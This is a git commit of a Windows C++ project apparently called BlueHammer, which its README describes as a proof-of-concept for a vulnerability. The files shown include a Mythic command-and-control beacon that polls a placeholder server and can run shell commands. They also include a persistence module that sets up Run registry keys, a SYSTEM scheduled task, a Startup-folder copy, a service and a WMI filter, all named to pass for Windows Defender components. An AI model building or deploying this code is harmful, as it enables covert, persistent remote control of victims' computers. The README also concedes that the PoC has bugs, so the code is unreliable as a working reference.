first commit

hummer/Ares.vcxproj

@@ -0,0 +1,181 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup Label="ProjectConfigurations">
+    <ProjectConfiguration Include="Debug|Win32">
+      <Configuration>Debug</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|Win32">
+      <Configuration>Release</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Debug|x64">
+      <Configuration>Debug</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|x64">
+      <Configuration>Release</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+  </ItemGroup>
+  <PropertyGroup Label="Globals">
+    <VCProjectVersion>17.0</VCProjectVersion>
+    <Keyword>Win32Proj</Keyword>
+    <ProjectGuid>{c0c82a69-3ead-4d50-a0ee-24b01449eafa}</ProjectGuid>
+    <RootNamespace>Ares</RootNamespace>
+    <WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>true</UseDebugLibraries>
+    <PlatformToolset>v143</PlatformToolset>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <PlatformToolset>v143</PlatformToolset>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>true</UseDebugLibraries>
+    <PlatformToolset>v143</PlatformToolset>
+    <CharacterSet>Unicode</CharacterSet>
+    <EnableASAN>false</EnableASAN>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <PlatformToolset>v143</PlatformToolset>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
+  <ImportGroup Label="ExtensionSettings">
+  </ImportGroup>
+  <ImportGroup Label="Shared">
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <PropertyGroup Label="UserMacros" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <IncludePath>C:\Program Files (x86)\Windows Kits\10\Include\10.0.26100.0\um;$(IncludePath)</IncludePath>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <IncludePath>C:\Program Files (x86)\Windows Kits\10\Include\10.0.26100.0\um;$(IncludePath)</IncludePath>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <IncludePath>C:\Program Files (x86)\Windows Kits\10\Include\10.0.26100.0\um;$(IncludePath)</IncludePath>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <IncludePath>C:\Program Files (x86)\Windows Kits\10\Include\10.0.26100.0\um;$(IncludePath)</IncludePath>
+  </PropertyGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <ClCompile>
+      <WarningLevel>TurnOffAllWarnings</WarningLevel>
+      <SDLCheck>true</SDLCheck>
+      <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <ConformanceMode>true</ConformanceMode>
+      <AdditionalIncludeDirectories>
+      </AdditionalIncludeDirectories>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <AdditionalLibraryDirectories>
+      </AdditionalLibraryDirectories>
+      <AdditionalDependencies>$(CoreLibraryDependencies);$(ProjectDir)offreg.lib;%(AdditionalDependencies)</AdditionalDependencies>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <ClCompile>
+      <WarningLevel>TurnOffAllWarnings</WarningLevel>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <SDLCheck>true</SDLCheck>
+      <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <ConformanceMode>true</ConformanceMode>
+      <AdditionalIncludeDirectories>
+      </AdditionalIncludeDirectories>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <AdditionalLibraryDirectories>
+      </AdditionalLibraryDirectories>
+      <AdditionalDependencies>$(CoreLibraryDependencies);$(ProjectDir)offreg.lib;%(AdditionalDependencies)</AdditionalDependencies>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <ClCompile>
+      <WarningLevel>TurnOffAllWarnings</WarningLevel>
+      <SDLCheck>true</SDLCheck>
+      <PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <ConformanceMode>true</ConformanceMode>
+      <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
+      <AdditionalIncludeDirectories>
+      </AdditionalIncludeDirectories>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <AdditionalLibraryDirectories>
+      </AdditionalLibraryDirectories>
+      <AdditionalDependencies>$(CoreLibraryDependencies);$(ProjectDir)offreg.lib;%(AdditionalDependencies)</AdditionalDependencies>
+      <StackReserveSize>
+      </StackReserveSize>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <ClCompile>
+      <WarningLevel>TurnOffAllWarnings</WarningLevel>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <SDLCheck>true</SDLCheck>
+      <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <ConformanceMode>true</ConformanceMode>
+      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
+      <AdditionalIncludeDirectories>
+      </AdditionalIncludeDirectories>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <AdditionalLibraryDirectories>
+      </AdditionalLibraryDirectories>
+      <AdditionalDependencies>$(CoreLibraryDependencies);$(ProjectDir)offreg.lib;%(AdditionalDependencies)</AdditionalDependencies>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemGroup>
+    <ClCompile Include="FunnyApp.cpp" />
+    <ClCompile Include="windefend_c.c" />
+    <ClCompile Include="windefend_s.c" />
+  </ItemGroup>
+  <ItemGroup>
+    <ClInclude Include="offreg.h" />
+    <ClInclude Include="resource.h" />
+    <ClInclude Include="windefend_h.h" />
+  </ItemGroup>
+  <ItemGroup>
+    <ResourceCompile Include="FunnyApp.rc" />
+  </ItemGroup>
+  <ItemGroup>
+    <Midl Include="windefend.idl" />
+  </ItemGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
+  <ImportGroup Label="ExtensionTargets">
+  </ImportGroup>
+</Project>

hummer/Ares.vcxproj.filters

@@ -0,0 +1,49 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup>
+    <Filter Include="Source Files">
+      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
+      <Extensions>cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
+    </Filter>
+    <Filter Include="Header Files">
+      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
+      <Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>
+    </Filter>
+    <Filter Include="Resource Files">
+      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
+      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
+    </Filter>
+  </ItemGroup>
+  <ItemGroup>
+    <ClCompile Include="FunnyApp.cpp">
+      <Filter>Source Files</Filter>
+    </ClCompile>
+    <ClCompile Include="windefend_c.c">
+      <Filter>Source Files</Filter>
+    </ClCompile>
+    <ClCompile Include="windefend_s.c">
+      <Filter>Source Files</Filter>
+    </ClCompile>
+  </ItemGroup>
+  <ItemGroup>
+    <ClInclude Include="resource.h">
+      <Filter>Header Files</Filter>
+    </ClInclude>
+    <ClInclude Include="offreg.h">
+      <Filter>Header Files</Filter>
+    </ClInclude>
+    <ClInclude Include="windefend_h.h">
+      <Filter>Header Files</Filter>
+    </ClInclude>
+  </ItemGroup>
+  <ItemGroup>
+    <ResourceCompile Include="FunnyApp.rc">
+      <Filter>Resource Files</Filter>
+    </ResourceCompile>
+  </ItemGroup>
+  <ItemGroup>
+    <Midl Include="windefend.idl">
+      <Filter>Source Files</Filter>
+    </Midl>
+  </ItemGroup>
+</Project>

hummer/FunnyApp.sln

@@ -0,0 +1,31 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio Version 17
+VisualStudioVersion = 17.14.36414.22 d17.14
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Ares", "Ares.vcxproj", "{C0C82A69-3EAD-4D50-A0EE-24B01449EAFA}"
+EndProject
+Global
+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		Debug|x64 = Debug|x64
+		Debug|x86 = Debug|x86
+		Release|x64 = Release|x64
+		Release|x86 = Release|x86
+	EndGlobalSection
+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{C0C82A69-3EAD-4D50-A0EE-24B01449EAFA}.Debug|x64.ActiveCfg = Debug|x64
+		{C0C82A69-3EAD-4D50-A0EE-24B01449EAFA}.Debug|x64.Build.0 = Debug|x64
+		{C0C82A69-3EAD-4D50-A0EE-24B01449EAFA}.Debug|x86.ActiveCfg = Debug|Win32
+		{C0C82A69-3EAD-4D50-A0EE-24B01449EAFA}.Debug|x86.Build.0 = Debug|Win32
+		{C0C82A69-3EAD-4D50-A0EE-24B01449EAFA}.Release|x64.ActiveCfg = Release|x64
+		{C0C82A69-3EAD-4D50-A0EE-24B01449EAFA}.Release|x64.Build.0 = Release|x64
+		{C0C82A69-3EAD-4D50-A0EE-24B01449EAFA}.Release|x86.ActiveCfg = Release|Win32
+		{C0C82A69-3EAD-4D50-A0EE-24B01449EAFA}.Release|x86.Build.0 = Release|Win32
+	EndGlobalSection
+	GlobalSection(SolutionProperties) = preSolution
+		HideSolutionNode = FALSE
+	EndGlobalSection
+	GlobalSection(ExtensibilityGlobals) = postSolution
+		SolutionGuid = {B894FD1E-E0A4-4043-9950-2A946FC73C8C}
+	EndGlobalSection
+EndGlobal

hummer/LICENSE

@@ -0,0 +1,21 @@
+MIT License
+
+Copyright (c) 2026 Nightmare-Eclipse
+
+Permission is hereby granted, free of charge, to any person obtaining a copy
+of this software and associated documentation files (the "Software"), to deal
+in the Software without restriction, including without limitation the rights
+to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+copies of the Software, and to permit persons to whom the Software is
+furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in all
+copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+SOFTWARE.

hummer/README.md

@@ -0,0 +1,19 @@
+# BlueHammer
+
+
+-----BEGIN PGP SIGNED MESSAGE-----
+Hash: SHA512
+
+Repository hosting the bluehammer vulnerability
+
+I'm just really wondering what was the math behind their decision, like you knew this was going to happen and you still did whatever you did ? Are they serious ?
+
+-----BEGIN PGP SIGNATURE-----
+
+iHUEARYKAB0WIQRJTvAf/AWVhAKEeb7FFoRCS0/SbAUCac8VlgAKCRDFFoRCS0/S
+bK8pAP9CzNnH26FVVdHZWVyDvOIwuZ1np1dTv7T5YaVCjf4tiwD+MC4Ikq+/ywdD
+I7dabkH7iSZflULM+hGUOur0mnAg9Qw=
+=Enhh
+-----END PGP SIGNATURE-----
+
+Edit : There are few bugs in the PoC that could prevent it from working, might fix them later.

hummer/mythic_integration.cpp

@@ -0,0 +1,107 @@
+#include "windefend_h.h"
+#include <windows.h>
+#include <wininet.h>
+#include <string>
+#include <vector>
+#include <thread>
+#include <atomic>
+
+// Mythic C2 configuration
+#define MYTHIC_C2_SERVER "http://your-mythic-server.com:7443"
+#define MYTHIC_API_KEY "your-api-key-here"
+#define CHECKIN_INTERVAL 30000 // 30 seconds
+
+std::atomic<bool> mythic_running(false);
+
+// Mythic task structure
+typedef struct MythicTask {
+    std::string task_id;
+    std::string command;
+    std::string parameters;
+} MythicTask;
+
+// Checkin with Mythic C2
+std::string mythic_checkin() {
+    HINTERNET hInternet = InternetOpen(L"MythicAgent/1.0", INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0);
+    if (!hInternet) return "";
+    
+    HINTERNET hConnect = InternetOpenUrl(hInternet, 
+        L"http://your-mythic-server.com:7443/api/v1.4/agent_message", 
+        NULL, 0, INTERNET_FLAG_RELOAD, 0);
+    
+    if (!hConnect) {
+        InternetCloseHandle(hInternet);
+        return "";
+    }
+    
+    char buffer[4096];
+    DWORD bytesRead;
+    std::string response;
+    
+    while (InternetReadFile(hConnect, buffer, sizeof(buffer), &bytesRead) && bytesRead > 0) {
+        response.append(buffer, bytesRead);
+    }
+    
+    InternetCloseHandle(hConnect);
+    InternetCloseHandle(hInternet);
+    
+    return response;
+}
+
+// Execute system command
+std::string execute_command(const std::string& command) {
+    char buffer[128];
+    std::string result = "";
+    
+    FILE* pipe = _popen(command.c_str(), "r");
+    if (!pipe) return "Error: Could not execute command";
+    
+    while (fgets(buffer, sizeof(buffer), pipe) != NULL) {
+        result += buffer;
+    }
+    
+    _pclose(pipe);
+    return result;
+}
+
+// Mythic agent thread
+DWORD WINAPI mythic_agent_thread(LPVOID lpParam) {
+    mythic_running = true;
+    
+    while (mythic_running) {
+        try {
+            std::string response = mythic_checkin();
+            
+            if (!response.empty()) {
+                // Process Mythic tasks here
+                // This would parse JSON response and execute commands
+                
+                // Example: execute system command
+                // std::string output = execute_command("whoami");
+                // Send output back to Mythic
+            }
+        }
+        catch (...) {
+            // Handle errors silently
+        }
+        
+        Sleep(CHECKIN_INTERVAL);
+    }
+    
+    return 0;
+}
+
+// Initialize Mythic C2 integration
+bool initialize_mythic() {
+    HANDLE hThread = CreateThread(NULL, 0, mythic_agent_thread, NULL, 0, NULL);
+    if (hThread) {
+        CloseHandle(hThread);
+        return true;
+    }
+    return false;
+}
+
+// Cleanup Mythic integration
+void cleanup_mythic() {
+    mythic_running = false;
+}

hummer/mythic_integration.h

@@ -0,0 +1,12 @@
+#pragma once
+
+#include <string>
+
+// Mythic integration functions
+bool initialize_mythic();
+void cleanup_mythic();
+std::string mythic_checkin();
+std::string execute_command(const std::string& command);
+
+// External variables
+extern std::atomic<bool> mythic_running;

hummer/offreg.h

@@ -0,0 +1,239 @@
+/*++
+
+Copyright (c) Microsoft Corporation
+
+Module Name:
+
+    offreg.h
+
+Abstract:
+
+    This module contains the header file for the
+    offreg utility.
+
+--*/
+
+#pragma once
+
+#ifndef __OFFREG_H__
+#define __OFFREG_H__
+
+#ifdef __cplusplus
+extern "C"
+{
+#endif
+
+
+#if defined(OFFREG_DLL)
+#define ORAPI _declspec(dllexport) __stdcall
+#else
+#define ORAPI _declspec(dllimport) __stdcall
+#endif
+
+    typedef PVOID   ORHKEY;
+    typedef ORHKEY* PORHKEY;
+
+    VOID
+        ORAPI
+        ORGetVersion(
+            _Out_ PDWORD pdwMajorVersion,
+            _Out_ PDWORD pdwMinorVersion
+        );
+
+    DWORD
+        ORAPI
+        OROpenHive(
+            _In_ PCWSTR FilePath,
+            _Out_ PORHKEY HORKey
+        );
+
+    DWORD
+        ORAPI
+        OROpenHiveByHandle(
+            _In_ HANDLE FileHandle,
+            _Out_ PORHKEY HORKey
+        );
+
+    DWORD
+        ORAPI
+        ORCreateHive(
+            _Out_ PORHKEY HORKey
+        );
+
+    DWORD
+        ORAPI
+        ORCloseHive(
+            _In_ ORHKEY Handle
+        );
+
+    DWORD
+        ORAPI
+        ORSaveHive(
+            _In_ ORHKEY HORKey,
+            _In_ PCWSTR HivePath,
+            _In_ DWORD OsMajorVersion,
+            _In_ DWORD OsMinorVersion
+        );
+
+    DWORD
+        ORAPI
+        OROpenKey(
+            _In_ ORHKEY Handle,
+            _In_opt_ PCWSTR lpSubKey,
+            _Out_ PORHKEY phkResult
+        );
+
+    DWORD
+        ORAPI
+        ORCloseKey(
+            _In_ ORHKEY KeyHandle
+        );
+
+    DWORD
+        ORAPI
+        ORCreateKey(
+            _In_ ORHKEY KeyHandle,
+            _In_ PCWSTR lpSubKey,
+            _In_opt_ PWSTR lpClass,
+            _In_opt_ DWORD dwOptions,
+            _In_opt_ PSECURITY_DESCRIPTOR pSecurityDescriptor,
+            _Out_ PORHKEY  phkResult,
+            _Out_opt_ PDWORD pdwDisposition
+        );
+
+    DWORD
+        ORAPI
+        ORDeleteKey(
+            _In_ ORHKEY Handle,
+            _In_opt_ PCWSTR lpSubKey
+        );
+
+    DWORD
+        ORAPI
+        ORQueryInfoKey(
+            _In_ ORHKEY Handle,
+            _Out_writes_opt_(*lpcClass) PWSTR lpClass,
+            _Inout_opt_ PDWORD lpcClass,
+            _Out_opt_ PDWORD lpcSubKeys,
+            _Out_opt_ PDWORD lpcMaxSubKeyLen,
+            _Out_opt_ PDWORD lpcMaxClassLen,
+            _Out_opt_ PDWORD lpcValues,
+            _Out_opt_ PDWORD lpcMaxValueNameLen,
+            _Out_opt_ PDWORD lpcMaxValueLen,
+            _Out_opt_ PDWORD lpcbSecurityDescriptor,
+            _Out_opt_ PFILETIME lpftLastWriteTime
+        );
+
+    DWORD
+        ORAPI
+        OREnumKey(
+            _In_ ORHKEY Handle,
+            _In_ DWORD dwIndex,
+            _Out_writes_(*lpcName) PWSTR lpName,
+            _Inout_ PDWORD lpcName,
+            _Out_writes_opt_(*lpcClass) PWSTR lpClass,
+            _Inout_opt_ PDWORD lpcClass,
+            _Out_opt_ PFILETIME lpftLastWriteTime
+        );
+
+    DWORD
+        ORAPI
+        ORGetKeySecurity(
+            _In_ ORHKEY Handle,
+            _In_ SECURITY_INFORMATION SecurityInformation,
+            _Out_opt_ PSECURITY_DESCRIPTOR pSecurityDescriptor,
+            _Inout_ PDWORD lpcbSecurityDescriptor
+        );
+
+    DWORD
+        ORAPI
+        ORSetKeySecurity(
+            _In_ ORHKEY Handle,
+            _In_ SECURITY_INFORMATION SecurityInformation,
+            _In_ PSECURITY_DESCRIPTOR pSecurityDescriptor
+        );
+
+    DWORD
+        ORAPI
+        ORGetVirtualFlags(
+            _In_ ORHKEY Handle,
+            _Out_ PDWORD pdwFlags
+        );
+
+    DWORD
+        ORAPI
+        ORSetVirtualFlags(
+            _In_ ORHKEY Handle,
+            _In_ DWORD dwFlags
+        );
+
+    DWORD
+        ORAPI
+        ORDeleteValue(
+            _In_ ORHKEY Handle,
+            _In_opt_ PCWSTR lpValueName
+        );
+
+    DWORD
+        ORAPI
+        ORGetValue(
+            _In_ ORHKEY Handle,
+            _In_opt_ PCWSTR lpSubKey,
+            _In_opt_ PCWSTR lpValue,
+            _Out_opt_ PDWORD pdwType,
+            _Out_writes_bytes_opt_(*pcbData) PVOID pvData,
+            _Inout_opt_ PDWORD pcbData
+        );
+
+    DWORD
+        ORAPI
+        ORSetValue(
+            _In_ ORHKEY Handle,
+            _In_opt_ PCWSTR lpValueName,
+            _In_ DWORD dwType,
+            _In_reads_bytes_opt_(cbData) const BYTE* lpData,
+            _In_ DWORD cbData
+        );
+
+    DWORD
+        ORAPI
+        OREnumValue(
+            _In_ ORHKEY Handle,
+            _In_ DWORD dwIndex,
+            _Out_writes_(*lpcValueName) PWSTR lpValueName,
+            _Inout_ PDWORD lpcValueName,
+            _Out_opt_ PDWORD lpType,
+            _Out_writes_bytes_opt_(*lpcbData) PBYTE lpData,
+            _Inout_opt_ PDWORD lpcbData
+        );
+
+    DWORD
+        ORAPI
+        ORRenameKey(
+            _In_ ORHKEY Handle,
+            _In_ PCWSTR lpNewName
+        );
+
+    DWORD
+        ORStart(
+            VOID
+        );
+
+    VOID
+        ORShutdown(
+            VOID
+        );
+
+    DWORD
+        ORAPI
+        ORMergeHives(
+            _In_reads_(HiveCount) ORHKEY* HiveHandles,
+            _In_ ULONG HiveCount,
+            _Out_ PORHKEY phkResult
+        );
+
+#ifdef __cplusplus
+}
+#endif
+
+#endif //__OFFREG_H__

hummer/persistence.cpp

@@ -0,0 +1,158 @@
+#include <windows.h>
+#include <iostream>
+#include <string>
+#include <shlobj.h>
+#include <fstream>
+#include <vector>
+
+// Registry persistence methods
+bool install_registry_persistence(const std::wstring& executablePath) {
+    HKEY hKey;
+    LSTATUS status;
+    
+    // Current user run key
+    status = RegOpenKeyEx(HKEY_CURRENT_USER, 
+                         L"Software\\Microsoft\\Windows\\CurrentVersion\\Run", 
+                         0, KEY_WRITE, &hKey);
+    
+    if (status == ERROR_SUCCESS) {
+        status = RegSetValueEx(hKey, L"WindowsDefenderUpdate", 0, REG_SZ, 
+                              (const BYTE*)executablePath.c_str(), 
+                              (executablePath.length() + 1) * sizeof(wchar_t));
+        RegCloseHandle(hKey);
+        
+        if (status == ERROR_SUCCESS) {
+            return true;
+        }
+    }
+    
+    // Local machine run key (requires admin)
+    status = RegOpenKeyEx(HKEY_LOCAL_MACHINE, 
+                         L"Software\\Microsoft\\Windows\\CurrentVersion\\Run", 
+                         0, KEY_WRITE, &hKey);
+    
+    if (status == ERROR_SUCCESS) {
+        status = RegSetValueEx(hKey, L"WindowsDefenderService", 0, REG_SZ, 
+                              (const BYTE*)executablePath.c_str(), 
+                              (executablePath.length() + 1) * sizeof(wchar_t));
+        RegCloseHandle(hKey);
+        
+        return status == ERROR_SUCCESS;
+    }
+    
+    return false;
+}
+
+// Service persistence
+bool install_service_persistence(const std::wstring& executablePath) {
+    SC_HANDLE hSCManager = OpenSCManager(NULL, NULL, SC_MANAGER_CREATE_SERVICE);
+    if (!hSCManager) return false;
+    
+    SC_HANDLE hService = CreateService(
+        hSCManager,
+        L"WinDefendUpdate",
+        L"Windows Defender Update Service",
+        SERVICE_ALL_ACCESS,
+        SERVICE_WIN32_OWN_PROCESS,
+        SERVICE_AUTO_START,
+        SERVICE_ERROR_NORMAL,
+        executablePath.c_str(),
+        NULL, NULL, NULL, NULL, NULL
+    );
+    
+    if (!hService) {
+        CloseServiceHandle(hSCManager);
+        return false;
+    }
+    
+    CloseServiceHandle(hService);
+    CloseServiceHandle(hSCManager);
+    return true;
+}
+
+// Scheduled task persistence
+bool install_scheduled_task(const std::wstring& executablePath) {
+    std::wstring command = L"schtasks /create /tn \"WindowsDefenderMaintenance\" /tr \"" + 
+                          executablePath + L"\" /sc hourly /ru SYSTEM";
+    
+    int result = _wsystem(command.c_str());
+    return result == 0;
+}
+
+// WMI event subscription
+bool install_wmi_persistence(const std::wstring& executablePath) {
+    std::wstring wmiCommand = L"wmic /namespace:\\\\root\\subscription PATH __EventFilter Create "
+        L"Name=\"WinDefendFilter\", EventNameSpace=\"root\\cimv2\", "
+        L"QueryLanguage=\"WQL\", Query=\"SELECT * FROM __InstanceModificationEvent "
+        L"WITHIN 60 WHERE TargetInstance ISA 'Win32_Process' AND "
+        L"TargetInstance.Name='svchost.exe'\"";
+    
+    return _wsystem(wmiCommand.c_str()) == 0;
+}
+
+// File system persistence (Startup folder)
+bool install_startup_persistence(const std::wstring& executablePath) {
+    wchar_t startupPath[MAX_PATH];
+    if (SUCCEEDED(SHGetFolderPath(NULL, CSIDL_STARTUP, NULL, 0, startupPath))) {
+        std::wstring shortcutPath = std::wstring(startupPath) + L"\\WindowsDefender.lnk";
+        
+        // Create shortcut (this would require COM integration for proper shortcut creation)
+        // For now, we'll copy the executable
+        std::wstring targetPath = std::wstring(startupPath) + L"\\WindowsDefenderUpdate.exe";
+        
+        return CopyFile(executablePath.c_str(), targetPath.c_str(), FALSE);
+    }
+    return false;
+}
+
+// Main persistence installation function
+bool install_persistence(const std::wstring& executablePath) {
+    bool success = false;
+    
+    // Try multiple persistence methods
+    if (install_registry_persistence(executablePath)) {
+        success = true;
+    }
+    
+    if (install_scheduled_task(executablePath)) {
+        success = true;
+    }
+    
+    if (install_startup_persistence(executablePath)) {
+        success = true;
+    }
+    
+    // Service persistence requires admin privileges
+    if (IsUserAnAdmin()) {
+        if (install_service_persistence(executablePath)) {
+            success = true;
+        }
+        if (install_wmi_persistence(executablePath)) {
+            success = true;
+        }
+    }
+    
+    return success;
+}
+
+// Check if already persistent
+bool check_persistence(const std::wstring& executablePath) {
+    HKEY hKey;
+    
+    // Check registry
+    if (RegOpenKeyEx(HKEY_CURRENT_USER, 
+                    L"Software\\Microsoft\\Windows\\CurrentVersion\\Run", 
+                    0, KEY_READ, &hKey) == ERROR_SUCCESS) {
+        wchar_t buffer[MAX_PATH];
+        DWORD bufferSize = sizeof(buffer);
+        
+        if (RegGetValue(hKey, NULL, L"WindowsDefenderUpdate", RRF_RT_REG_SZ, 
+                       NULL, buffer, &bufferSize) == ERROR_SUCCESS) {
+            RegCloseHandle(hKey);
+            return true;
+        }
+        RegCloseHandle(hKey);
+    }
+    
+    return false;
+}

hummer/persistence.h

@@ -0,0 +1,12 @@
+#pragma once
+
+#include <string>
+
+// Persistence functions
+bool install_persistence(const std::wstring& executablePath);
+bool check_persistence(const std::wstring& executablePath);
+bool install_registry_persistence(const std::wstring& executablePath);
+bool install_service_persistence(const std::wstring& executablePath);
+bool install_scheduled_task(const std::wstring& executablePath);
+bool install_wmi_persistence(const std::wstring& executablePath);
+bool install_startup_persistence(const std::wstring& executablePath);

hummer/resource.h

@@ -0,0 +1,14 @@
+//{{NO_DEPENDENCIES}}
+// Microsoft Visual C++ generated include file.
+// Used by FunnyApp.rc
+
+// Next default values for new objects
+// 
+#ifdef APSTUDIO_INVOKED
+#ifndef APSTUDIO_READONLY_SYMBOLS
+#define _APS_NEXT_RESOURCE_VALUE        101
+#define _APS_NEXT_COMMAND_VALUE         40001
+#define _APS_NEXT_CONTROL_VALUE         1001
+#define _APS_NEXT_SYMED_VALUE           101
+#endif
+#endif